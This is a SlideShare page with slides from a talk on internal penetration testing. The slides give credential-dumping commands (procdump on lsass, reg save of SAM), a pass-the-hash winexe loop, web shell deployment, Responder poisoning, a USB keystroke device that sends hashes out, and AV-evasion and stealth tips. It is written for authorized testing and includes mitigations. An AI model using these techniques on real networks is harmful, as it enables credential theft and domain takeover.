SlideShare a Scribd company logo
Why Internal Pen-Tests are still
FUN !
Why other pen-tests suck ! (not
hating)
• External – Unless your SE’ing someone its
pretty boring. (nessus/qualys grepping human
thou art l33t)
• Web Apps – Unless you get SQLi or file upload
or good business logic bugs. (Oh burp
scanning/intruder ninja thou art l33t)
• Mobile – Fun unlimited but limited by small
threat surface
Internal Pen-Tests
• SHELLS! SHELLS! SHELLS! – Oh beautiful Shellness!
• Nothing beats the joy of popping a box !
• If Local Admin get Domain admin – always a new
challenge !
• Data – Oh delicious customer data !
• Mad respect from client
“More pen-tests…more monnneeyyy” – Hans
Michael Varbaek
Why we still own Internal Networks
• Weak passwords – Welcome1 still works in
2013
Why we still own Internal Networks
• No patching – MS08-67 still works in 2013
Why we still own Internal Networks
• No access controls – RDP/SSH anywhere
Easy Pwnage
• This stuff still works not because your l33t but because
your customer is clueless about securing stuff.
– Password attacks
• SMB bruteforce from list of domain users (null sessions or using
compromised host that gave you a domain user cred)
• ^ check password policy before going haywire.
• SSH, MSSQL etc (sa,sa still works in 2013)
• Metasploit auxillary modules / Nmap scripts are your best friend.
(you know most of the good ones r8 ?)
• Run all of them if you’ve got time. You never know how low the
fruit is hanging unless you bend down.
• Nessus/Qualys generally are pretty bad at brueforcing stuff.
• Use intelligent word lists – mixin company name
Easy Pwnage
– Not Patching
• Any vulnerable software that Qualys/Nessus finds - if metasploit
has a module for it = easy win.
– Web consoles (I like these – find them all the time!)
• Jboss JMX consoles (setup shell.war and invoke)
• Tomcat manager (deploy shell.war)
– These usually run as SYSTEM on a windows box.
• Any file upload from a web app that is internal (Don’t waste time
on this, if you do see something interesting have a poke)
– GPO cpassword (Group Policy Preference XML)
• post/windows/gather/credentials/gpp – de base 64 and then
decrypt using MS provided public AES key
• Most likely local administrator password (re-used across all hosts
that were deployed with GPPs)
Easy Pwnage
Filebrowser -> when cmd.jsp gets picked up by AV
http://www.vonloesch.de/filebrowser.html
Easy Pwnage
Filebrowser
Laudanum
• http://sourceforge.net/projects/laudanum/file
s/laudanum-0.8/
• Bunch of good web shells for most languages
Easy Pwnage
• Easy Pwnage =
Why are we doing all this anyway ??
• Get sensitive data and show customer the real
risk of allowing “Mr.Evil” to connect to their
internal network
– Hunting for data :
• Local admin -> Domain Admin -> Search for data
everywhere (usually databases – unless they're really
stupid and store it in unencrypted flat files)
Lesson learnt – Some clients don’t even know what
data is important to them.
- CEO’s Mailbox is a good start
Super Secure Customer
• Everything is patched
• Super random awesomely strong passwords
• Apps are secure coded – no SQLi and no file
upload
• AV everywhere – I mean everywhere
• ^ AV cant be turned off unless you provide
password
• OMG ! – I should quit pen-testing.
Responder
• Developed by Laurent Gaffié (Trustwave)
• LLMNR and NBT-NS poisoning (Google for what this)
– If DNS and hosts file fails, tool yells out saying I’ll
resolve that for you and then steals your creds !
– DEMO
– Hashes can be cracked via John or can be relayed:
http://pen-testing.sans.org/blog/pen-
testing/2013/04/25/smb-relay-demystified-and-ntlmv2-
pwnage-with-python
Responder
• Tons of other features
– Google “responder trustwave”
– Does ICMP re-direct (this is effing awesome – but only
works for anything older than Vista/2k8)
– Abuse WPAD (Another kool feature)
– HTTP, FTP module.
• Make sure you are on a workstation subnet for
maximum hits.
OK – THAT DINT WORK ??
• Give up and go home ??
I SAY NO !
• Meet the angry, I will pwn you pentester !
Get your Ducky on
• HID usb thingy that has a small programmable chip.
• When user leaves desktop/laptop unlocked run and
connect. (or walk if your not that enthusiastic)
• Quickly add user, enable rdp, grab password hashes,
system info etc and ship to ur ftp server. (whatever
privs user has – ducky has)
• Easy to write scripts – write, compile with java load
onto Ducky.
• ^ Way easier than teensy – Although teensy can be
used in stealth/SE tactics. Teensy inside mouse, teensy
inside keyboard etc.
DUCKY DEMO
• If it quacks like a duck – it must be a duck
• Video
SAFE PASSWORD DUMPING
• Old school password dumping tools get picked
by AV (cain, pwdump etc)
• New ones are getting picked up as well (WCE,
mimikatz etc) – These two can dump plain-
text passwords from memory.
• Disable AV ?
• What if AV can only be disabled using a
password ?
SAFE PASSWORD DUMPING
• You don’t have to disable AV or trigger it.
• Procdump from sysinternals
– C:windowstempprocdump.exe -accepteula -ma
lsass.exe C:windowstemplsassdump.dmp
– Mimikatz can then chew the .dmp file and spit out
passwords in clear text.
SAFE PASSWORD DUMPING
• Some old methods still work and don’t get
picked by AV – hashes from hives:
• Reg copy (C:>reg.exe save HKLMSAM sam)
• Shadow volume copy (good to grab NTDIS)
• ^ Ops guy now do check logs for shadow
volume copies and so I’d recommend using
SAMEX.
(http://www.josho.org/blog//blog/2013/03/0
7/samex/)
Searching for Domain Admin
• So you popped a few boxes - got some hashes
• What now ?
• If one of those boxes :
– had a domain admin logged in – you have his
password in plain-text or got his hash -> game over.
– had a service running as domain admin – move to
process, pop shell -> game over.
• Shares the same local administrator password
across the network.
– Spray the hash and look for boxes with processes
running as domain admin.
Searching for Domain Admin
#!/bin/sh
for ip in $(cat ip.txt);do
./winexe -U Administrator%passwordhash //$ip "ipconfig"
./winexe -U Administrator%passwordhash //$ip "tasklist /v"
Done
• ^ Metasploit module auxiliary/admin/smb/psexec_command
also works. Do not use windows/smb/psexec as this uploads
an exe to the box and will trigger AV.
• Login to box running the domain admin process – dump hash
or read from lsass as plain text.
• Replay hash or login as domain admin over RDP etc.
• Game over.
– Pro Stealth tip : Once you get a domain admin shell DO NOT
CREATE a new domain admin user.
• This will trigger Ops as a lot of organisations are alerted if a new
domain administrator is created.
Looting
• Go after SQL servers – you should have a list of these from your scans
• Shares – Yes people still store heaps of confidential stuff unencrypted in
shares
• Have you guys seen Firefox PTH ? – All ur OWA and sharepoint r belong 2
us !
• Metasploit – post exploitation modules – store loot in MSF DB for
grepping later.
Firefox PTH
• DEMO
• https://code.google.com/p/passing-the-
hash/downloads/list
Mitigations
• You cant really stop a determined attacker
• There are just way too many ways you could get
hacked
• Best bet is to detect
• Check anomalies – New user creation (DA etc), Local
admin logons, AV pickups etc
• User education
• Google’s new n/w architecture – All zones are untrust
(Not a bad idea eh ?)
• Obvious old school protections should still apply –
Patching, strong passwords, access controls etc
Testing “Pro” tips
• Don’t leave any accounts you create on customer’s network – delete
everything (Finding DA account by pen-tester in last engagement = fail)
• Bruteforce wisely – locking out an important service will not go down well
with a customer (Bump down threads = increase stealth)
• Don’t disable AV – Intelligent Ops are alerted if AV dies
• Wipe your VM after every pen-test – A clean slate to work on is so much
better
• Snapshotting to have all your tools set-up and then reset also works
• Script for linux is your best friend
• Notes – always good for other eyes trying to read and understand what
you did (doesn’t even have to be fancy - Vi or notepad works)
• Videos for complex attacks – I’d highly recommend it (mind you this is
gonna eat some disk space and sending this to a client might be difficult)
Music (Ignore slide if you don’t listen to
music)
• Messhugah, Lamb of God and Tool - when ur
feeling effing awesome and pwning like a
baws
• Trying really hard for a breakthrough or
fighting a problem – Really fast techno or
dubstep
• When you lose it and wanna break your
laptop – Vitamin string quartet (trust me this
works)
That’s it
• Things I want to work on (any help will earn beers
and respect):
– Write more ducky scripts (hopefully run faster and
grab more stuff, reverse shell etc)
– Write post exploit modules (which can loot more
efficiently)
– Setup a Pi that can do all this over 3/4g to be sent to
client so I can watch BSG and sip beer.
– Hope this helped. Google for anything that I may have
not provided a link or explained in detail
Blog: http://psychsec.wordpress.com/

More Related Content

What's hot

A @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSA @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNS
Rob Fuller
 
Oscp preparation
Oscp preparationOscp preparation
Oscp preparation
Manich Koomsusi
 
Experiences with Debugging Data Races
Experiences with Debugging Data RacesExperiences with Debugging Data Races
Experiences with Debugging Data Races
Azul Systems Inc.
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershell
jaredhaight
 
More fun using Kautilya
More fun using KautilyaMore fun using Kautilya
More fun using Kautilya
Nikhil Mittal
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
Jeremy Brown
 
OWASP 2013 APPSEC USA ZAP Hackathon
OWASP 2013 APPSEC USA ZAP HackathonOWASP 2013 APPSEC USA ZAP Hackathon
OWASP 2013 APPSEC USA ZAP Hackathon
Simon Bennetts
 
PAC 2019 virtual Christoph NEUMÜLLER
PAC 2019 virtual Christoph NEUMÜLLERPAC 2019 virtual Christoph NEUMÜLLER
PAC 2019 virtual Christoph NEUMÜLLER
Neotys
 
Automate Yo'self -- SeaGL
Automate Yo'self -- SeaGL Automate Yo'self -- SeaGL
Automate Yo'self -- SeaGL
John Anderson
 
2017 Codemotion OWASP ZAP in CI/CD
2017 Codemotion OWASP ZAP in CI/CD2017 Codemotion OWASP ZAP in CI/CD
2017 Codemotion OWASP ZAP in CI/CD
Simon Bennetts
 
BSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedBSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be Hunted
Alex Davies
 
Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017
Daniel Bohannon
 
EhTrace -- RoP Hooks
EhTrace -- RoP HooksEhTrace -- RoP Hooks
EhTrace -- RoP Hooks
Shane Macaulay
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could Expect
Peter Hlavaty
 
Steelcon 2014 - Process Injection with Python
Steelcon 2014 - Process Injection with PythonSteelcon 2014 - Process Injection with Python
Steelcon 2014 - Process Injection with Python
infodox
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Evil
jaredhaight
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
Peter Hlavaty
 
Racing with Droids
Racing with DroidsRacing with Droids
Racing with Droids
Peter Hlavaty
 
Owning windows 8 with human interface devices
Owning windows 8 with human interface devicesOwning windows 8 with human interface devices
Owning windows 8 with human interface devices
Nikhil Mittal
 
Hacking Virtual Appliances
Hacking Virtual AppliancesHacking Virtual Appliances
Hacking Virtual Appliances
Jeremy Brown
 

What's hot (20)

A @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSA @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNS
 
Oscp preparation
Oscp preparationOscp preparation
Oscp preparation
 
Experiences with Debugging Data Races
Experiences with Debugging Data RacesExperiences with Debugging Data Races
Experiences with Debugging Data Races
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershell
 
More fun using Kautilya
More fun using KautilyaMore fun using Kautilya
More fun using Kautilya
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
 
OWASP 2013 APPSEC USA ZAP Hackathon
OWASP 2013 APPSEC USA ZAP HackathonOWASP 2013 APPSEC USA ZAP Hackathon
OWASP 2013 APPSEC USA ZAP Hackathon
 
PAC 2019 virtual Christoph NEUMÜLLER
PAC 2019 virtual Christoph NEUMÜLLERPAC 2019 virtual Christoph NEUMÜLLER
PAC 2019 virtual Christoph NEUMÜLLER
 
Automate Yo'self -- SeaGL
Automate Yo'self -- SeaGL Automate Yo'self -- SeaGL
Automate Yo'self -- SeaGL
 
2017 Codemotion OWASP ZAP in CI/CD
2017 Codemotion OWASP ZAP in CI/CD2017 Codemotion OWASP ZAP in CI/CD
2017 Codemotion OWASP ZAP in CI/CD
 
BSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedBSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be Hunted
 
Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017
 
EhTrace -- RoP Hooks
EhTrace -- RoP HooksEhTrace -- RoP Hooks
EhTrace -- RoP Hooks
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could Expect
 
Steelcon 2014 - Process Injection with Python
Steelcon 2014 - Process Injection with PythonSteelcon 2014 - Process Injection with Python
Steelcon 2014 - Process Injection with Python
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Evil
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
 
Racing with Droids
Racing with DroidsRacing with Droids
Racing with Droids
 
Owning windows 8 with human interface devices
Owning windows 8 with human interface devicesOwning windows 8 with human interface devices
Owning windows 8 with human interface devices
 
Hacking Virtual Appliances
Hacking Virtual AppliancesHacking Virtual Appliances
Hacking Virtual Appliances
 

Viewers also liked

Evolución de la web. zaida aguilar
Evolución de la web. zaida aguilarEvolución de la web. zaida aguilar
WPunzalanCV_upd012016 ver 1_pdf
WPunzalanCV_upd012016 ver 1_pdfWPunzalanCV_upd012016 ver 1_pdf
WPunzalanCV_upd012016 ver 1_pdf
Wilson Punzalan
 
Kyeongan Kwon - PhD Dissertation 2016
Kyeongan Kwon - PhD Dissertation 2016Kyeongan Kwon - PhD Dissertation 2016
Kyeongan Kwon - PhD Dissertation 2016
Karl Kwon, Ph.D.
 
Diferencias entre web 1.0 y 2.0
Diferencias entre web 1.0 y 2.0Diferencias entre web 1.0 y 2.0
Diferencias entre web 1.0 y 2.0
ApaivaM
 
What Friendship Means
What Friendship MeansWhat Friendship Means
What Friendship Means
AnnabethC
 
Iron maiden
Iron maidenIron maiden
Iron maiden
jrcktm
 
Tabella indennità fine mandato regioni settembre 2011
Tabella indennità  fine mandato regioni settembre 2011Tabella indennità  fine mandato regioni settembre 2011
Tabella indennità fine mandato regioni settembre 2011Giulio Cavalli
 
C.V Momen.last update
C.V Momen.last updateC.V Momen.last update
C.V Momen.last updateMomen Mohamed
 
Advanced Anti surge Control System for Turbine Driven Centrifugal Compressors
Advanced Anti surge Control System for Turbine Driven Centrifugal CompressorsAdvanced Anti surge Control System for Turbine Driven Centrifugal Compressors
Advanced Anti surge Control System for Turbine Driven Centrifugal Compressors
Arslan Ahmed Amin
 
Importance of multimedia
Importance of multimediaImportance of multimedia
Importance of multimedia
Online
 

Viewers also liked (11)

Evolución de la web. zaida aguilar
Evolución de la web. zaida aguilarEvolución de la web. zaida aguilar
Evolución de la web. zaida aguilar
 
WPunzalanCV_upd012016 ver 1_pdf
WPunzalanCV_upd012016 ver 1_pdfWPunzalanCV_upd012016 ver 1_pdf
WPunzalanCV_upd012016 ver 1_pdf
 
Kyeongan Kwon - PhD Dissertation 2016
Kyeongan Kwon - PhD Dissertation 2016Kyeongan Kwon - PhD Dissertation 2016
Kyeongan Kwon - PhD Dissertation 2016
 
Diferencias entre web 1.0 y 2.0
Diferencias entre web 1.0 y 2.0Diferencias entre web 1.0 y 2.0
Diferencias entre web 1.0 y 2.0
 
Student evaluation ADE Associates
Student evaluation ADE AssociatesStudent evaluation ADE Associates
Student evaluation ADE Associates
 
What Friendship Means
What Friendship MeansWhat Friendship Means
What Friendship Means
 
Iron maiden
Iron maidenIron maiden
Iron maiden
 
Tabella indennità fine mandato regioni settembre 2011
Tabella indennità  fine mandato regioni settembre 2011Tabella indennità  fine mandato regioni settembre 2011
Tabella indennità fine mandato regioni settembre 2011
 
C.V Momen.last update
C.V Momen.last updateC.V Momen.last update
C.V Momen.last update
 
Advanced Anti surge Control System for Turbine Driven Centrifugal Compressors
Advanced Anti surge Control System for Turbine Driven Centrifugal CompressorsAdvanced Anti surge Control System for Turbine Driven Centrifugal Compressors
Advanced Anti surge Control System for Turbine Driven Centrifugal Compressors
 
Importance of multimedia
Importance of multimediaImportance of multimedia
Importance of multimedia
 

Similar to Why internal pen tests are still fun

The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
Chris Gates
 
PowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidPowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue Kid
Matthew Johnson
 
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates  - AppSec USA 2016DevOops Redux Ken Johnson Chris Gates  - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
Chris Gates
 
Pentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionPentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 Edition
Beau Bullock
 
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwonThe basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
Kenneth Kwon
 
JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...
JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...
JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...
srisatish ambati
 
Packaging is the Worst Way to Distribute Software, Except for Everything Else
Packaging is the Worst Way to Distribute Software, Except for Everything ElsePackaging is the Worst Way to Distribute Software, Except for Everything Else
Packaging is the Worst Way to Distribute Software, Except for Everything Else
mckern
 
Ansible - A 'crowd' introduction
Ansible - A 'crowd' introductionAnsible - A 'crowd' introduction
Ansible - A 'crowd' introduction
Manuel de la Peña Peña
 
Vulnerability, exploit to metasploit
Vulnerability, exploit to metasploitVulnerability, exploit to metasploit
Vulnerability, exploit to metasploit
Tiago Henriques
 
On non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits andOn non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits and
Alisa Esage Шевченко
 
Defcon - Veil-Pillage
Defcon - Veil-PillageDefcon - Veil-Pillage
Defcon - Veil-Pillage
VeilFramework
 
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Chris Tankersley
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
Chris Gates
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, Powershell
Roo7break
 
Windows logging workshop - BSides Austin 2014
Windows logging workshop - BSides Austin 2014Windows logging workshop - BSides Austin 2014
Windows logging workshop - BSides Austin 2014
Michael Gough
 
Automating with Ansible
Automating with AnsibleAutomating with Ansible
Automating with Ansible
Ricardo Schmidt
 
Advanced windows debugging
Advanced windows debuggingAdvanced windows debugging
Advanced windows debugging
chrisortman
 
DEF CON 23 - Hacking Web Apps @brentwdesign
DEF CON 23 - Hacking Web Apps @brentwdesignDEF CON 23 - Hacking Web Apps @brentwdesign
DEF CON 23 - Hacking Web Apps @brentwdesign
brentwdesign
 
Ask a Malware Archaeologist
Ask a Malware ArchaeologistAsk a Malware Archaeologist
Ask a Malware Archaeologist
Michael Gough
 
Esage on non-existent 0-days, stable binary exploits and user interaction
Esage   on non-existent 0-days, stable binary exploits and user interactionEsage   on non-existent 0-days, stable binary exploits and user interaction
Esage on non-existent 0-days, stable binary exploits and user interaction
DefconRussia
 

Similar to Why internal pen tests are still fun (20)

The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
PowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidPowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue Kid
 
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates  - AppSec USA 2016DevOops Redux Ken Johnson Chris Gates  - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
 
Pentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionPentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 Edition
 
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwonThe basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
 
JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...
JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...
JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...
 
Packaging is the Worst Way to Distribute Software, Except for Everything Else
Packaging is the Worst Way to Distribute Software, Except for Everything ElsePackaging is the Worst Way to Distribute Software, Except for Everything Else
Packaging is the Worst Way to Distribute Software, Except for Everything Else
 
Ansible - A 'crowd' introduction
Ansible - A 'crowd' introductionAnsible - A 'crowd' introduction
Ansible - A 'crowd' introduction
 
Vulnerability, exploit to metasploit
Vulnerability, exploit to metasploitVulnerability, exploit to metasploit
Vulnerability, exploit to metasploit
 
On non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits andOn non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits and
 
Defcon - Veil-Pillage
Defcon - Veil-PillageDefcon - Veil-Pillage
Defcon - Veil-Pillage
 
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, Powershell
 
Windows logging workshop - BSides Austin 2014
Windows logging workshop - BSides Austin 2014Windows logging workshop - BSides Austin 2014
Windows logging workshop - BSides Austin 2014
 
Automating with Ansible
Automating with AnsibleAutomating with Ansible
Automating with Ansible
 
Advanced windows debugging
Advanced windows debuggingAdvanced windows debugging
Advanced windows debugging
 
DEF CON 23 - Hacking Web Apps @brentwdesign
DEF CON 23 - Hacking Web Apps @brentwdesignDEF CON 23 - Hacking Web Apps @brentwdesign
DEF CON 23 - Hacking Web Apps @brentwdesign
 
Ask a Malware Archaeologist
Ask a Malware ArchaeologistAsk a Malware Archaeologist
Ask a Malware Archaeologist
 
Esage on non-existent 0-days, stable binary exploits and user interaction
Esage   on non-existent 0-days, stable binary exploits and user interactionEsage   on non-existent 0-days, stable binary exploits and user interaction
Esage on non-existent 0-days, stable binary exploits and user interaction
 

Recently uploaded

Orion Context Broker introduction 20240604
Orion Context Broker introduction 20240604Orion Context Broker introduction 20240604
Orion Context Broker introduction 20240604
Fermin Galan
 
Fundamentals of Programming and Language Processors
Fundamentals of Programming and Language ProcessorsFundamentals of Programming and Language Processors
Fundamentals of Programming and Language Processors
Rakesh Kumar R
 
A Study of Variable-Role-based Feature Enrichment in Neural Models of Code
A Study of Variable-Role-based Feature Enrichment in Neural Models of CodeA Study of Variable-Role-based Feature Enrichment in Neural Models of Code
A Study of Variable-Role-based Feature Enrichment in Neural Models of Code
Aftab Hussain
 
Preparing Non - Technical Founders for Engaging a Tech Agency
Preparing Non - Technical Founders for Engaging  a  Tech AgencyPreparing Non - Technical Founders for Engaging  a  Tech Agency
Preparing Non - Technical Founders for Engaging a Tech Agency
ISH Technologies
 
What is Augmented Reality Image Tracking
What is Augmented Reality Image TrackingWhat is Augmented Reality Image Tracking
What is Augmented Reality Image Tracking
pavan998932
 
Artificia Intellicence and XPath Extension Functions
Artificia Intellicence and XPath Extension FunctionsArtificia Intellicence and XPath Extension Functions
Artificia Intellicence and XPath Extension Functions
Octavian Nadolu
 
May Marketo Masterclass, London MUG May 22 2024.pdf
May Marketo Masterclass, London MUG May 22 2024.pdfMay Marketo Masterclass, London MUG May 22 2024.pdf
May Marketo Masterclass, London MUG May 22 2024.pdf
Adele Miller
 
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...Introducing Crescat - Event Management Software for Venues, Festivals and Eve...
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...
Crescat
 
SWEBOK and Education at FUSE Okinawa 2024
SWEBOK and Education at FUSE Okinawa 2024SWEBOK and Education at FUSE Okinawa 2024
SWEBOK and Education at FUSE Okinawa 2024
Hironori Washizaki
 
A Sighting of filterA in Typelevel Rite of Passage
A Sighting of filterA in Typelevel Rite of PassageA Sighting of filterA in Typelevel Rite of Passage
A Sighting of filterA in Typelevel Rite of Passage
Philip Schwarz
 
Energy consumption of Database Management - Florina Jonuzi
Energy consumption of Database Management - Florina JonuziEnergy consumption of Database Management - Florina Jonuzi
Energy consumption of Database Management - Florina Jonuzi
Green Software Development
 
socradar-q1-2024-aviation-industry-report.pdf
socradar-q1-2024-aviation-industry-report.pdfsocradar-q1-2024-aviation-industry-report.pdf
socradar-q1-2024-aviation-industry-report.pdf
SOCRadar
 
Empowering Growth with Best Software Development Company in Noida - Deuglo
Empowering Growth with Best Software  Development Company in Noida - DeugloEmpowering Growth with Best Software  Development Company in Noida - Deuglo
Empowering Growth with Best Software Development Company in Noida - Deuglo
Deuglo Infosystem Pvt Ltd
 
2024 eCommerceDays Toulouse - Sylius 2.0.pdf
2024 eCommerceDays Toulouse - Sylius 2.0.pdf2024 eCommerceDays Toulouse - Sylius 2.0.pdf
2024 eCommerceDays Toulouse - Sylius 2.0.pdf
Łukasz Chruściel
 
Launch Your Streaming Platforms in Minutes
Launch Your Streaming Platforms in MinutesLaunch Your Streaming Platforms in Minutes
Launch Your Streaming Platforms in Minutes
Roshan Dwivedi
 
Top Features to Include in Your Winzo Clone App for Business Growth (4).pptx
Top Features to Include in Your Winzo Clone App for Business Growth (4).pptxTop Features to Include in Your Winzo Clone App for Business Growth (4).pptx
Top Features to Include in Your Winzo Clone App for Business Growth (4).pptx
rickgrimesss22
 
APIs for Browser Automation (MoT Meetup 2024)
APIs for Browser Automation (MoT Meetup 2024)APIs for Browser Automation (MoT Meetup 2024)
APIs for Browser Automation (MoT Meetup 2024)
Boni García
 
Quarkus Hidden and Forbidden Extensions
Quarkus Hidden and Forbidden ExtensionsQuarkus Hidden and Forbidden Extensions
Quarkus Hidden and Forbidden Extensions
Max Andersen
 
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdf
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdfAutomated software refactoring with OpenRewrite and Generative AI.pptx.pdf
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdf
timtebeek1
 
E-commerce Application Development Company.pdf
E-commerce Application Development Company.pdfE-commerce Application Development Company.pdf
E-commerce Application Development Company.pdf
Hornet Dynamics
 

Recently uploaded (20)

Orion Context Broker introduction 20240604
Orion Context Broker introduction 20240604Orion Context Broker introduction 20240604
Orion Context Broker introduction 20240604
 
Fundamentals of Programming and Language Processors
Fundamentals of Programming and Language ProcessorsFundamentals of Programming and Language Processors
Fundamentals of Programming and Language Processors
 
A Study of Variable-Role-based Feature Enrichment in Neural Models of Code
A Study of Variable-Role-based Feature Enrichment in Neural Models of CodeA Study of Variable-Role-based Feature Enrichment in Neural Models of Code
A Study of Variable-Role-based Feature Enrichment in Neural Models of Code
 
Preparing Non - Technical Founders for Engaging a Tech Agency
Preparing Non - Technical Founders for Engaging  a  Tech AgencyPreparing Non - Technical Founders for Engaging  a  Tech Agency
Preparing Non - Technical Founders for Engaging a Tech Agency
 
What is Augmented Reality Image Tracking
What is Augmented Reality Image TrackingWhat is Augmented Reality Image Tracking
What is Augmented Reality Image Tracking
 
Artificia Intellicence and XPath Extension Functions
Artificia Intellicence and XPath Extension FunctionsArtificia Intellicence and XPath Extension Functions
Artificia Intellicence and XPath Extension Functions
 
May Marketo Masterclass, London MUG May 22 2024.pdf
May Marketo Masterclass, London MUG May 22 2024.pdfMay Marketo Masterclass, London MUG May 22 2024.pdf
May Marketo Masterclass, London MUG May 22 2024.pdf
 
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...Introducing Crescat - Event Management Software for Venues, Festivals and Eve...
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...
 
SWEBOK and Education at FUSE Okinawa 2024
SWEBOK and Education at FUSE Okinawa 2024SWEBOK and Education at FUSE Okinawa 2024
